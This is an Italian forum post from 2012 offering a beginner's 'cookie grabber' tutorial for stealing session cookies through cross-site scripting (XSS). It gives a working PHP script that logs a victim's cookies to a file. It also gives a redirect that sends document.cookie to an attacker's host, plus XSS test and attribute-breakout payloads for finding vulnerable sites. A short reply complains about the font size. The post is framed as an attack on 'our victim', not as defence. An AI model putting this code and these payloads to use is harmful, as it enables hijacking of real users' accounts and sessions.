• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Guida cookie grabber

marcoshack

Nuovo utente
Autore del topic
10 Agosto 2012
2
0
Miglior risposta
0
QUESTA E' LA VERA GUIDA PER IL COOKIE GRABBER!
LA MIA PRIMA DISCUSSIONE!
Cookie Grabber.

Allora, per effettuare questo attacco è necessario sapere che, nel javascript, è presente una proprietà (document.cookie), che restituisce i nostri cookie. Ad esempio, inserendo nel sito buggato
<script>alert(document.cookie)</script>
vedremmo un alert con i nostri cookie di quel sito...Come possiamo sfruttarla per effettuare un attacco cookie stealing? Semplice, ma ci servirà una conoscenza basilare del php...il php è un linguaggio dinamico interpretato; al contrario del javascript, in esso, è il server ad eseguire i comandi e non il nostro browser (server-side).
Vediamo ora un esempio di pagina in php con la funzione di loggare i cookie del visitatore.
<?php
$filename = "cookie.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Errore: impossibile scrivere il file";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Errore durante la scrittura";
exit;
}
}
echo "Scrittura effettuata con successo =D";
fclose($handle);
exit;
}
echo "Niente da scrivere";
exit;
?>
PS. Bene, mettendo caso che questo file si chiami log.php redirettando un utente su 'www.nostrosito.com/log.php?cookie='+escape(document.cookie) si creerebbe www.nostrosito.com/cookie.txt contenente i cookie della nostra vittima del sito da cui sfruttiamo l'xss.

Ma che cos'è un xss
l'xss, è un attacco fatto direttamente dal browser (grazie a questo possiamo usare il cookie grabber).

Per vedere se un sito è vulnerabile basta usare:
CODICE
<script>alert("Hello World")</script>

Se appare l'alert il sito è vulnerabile, se no, no.
Ma come aggirare tale sistema?

CODICE
<input name="parola_da_cercare" type="text" class="campi_input" value="tuaparola">

"tuaparola" sostituiamolo con:
CODICE
"/><script>alert("Hello World")</script>

Con questo il sito è vulnerabile alle xss...ergo si puo' usare il cookie grabber.
Ecco tutto. Nonostante sembri pappa per "lamer" in realtà è una buona guida per qui vuole capire cos'è un cookie grabber e non saperlo solo per "sentito dire".
 
Riferimento: Guida cookie grabber

Perchè non abbassi la grandezza dei caratteri non si capisce niente .-.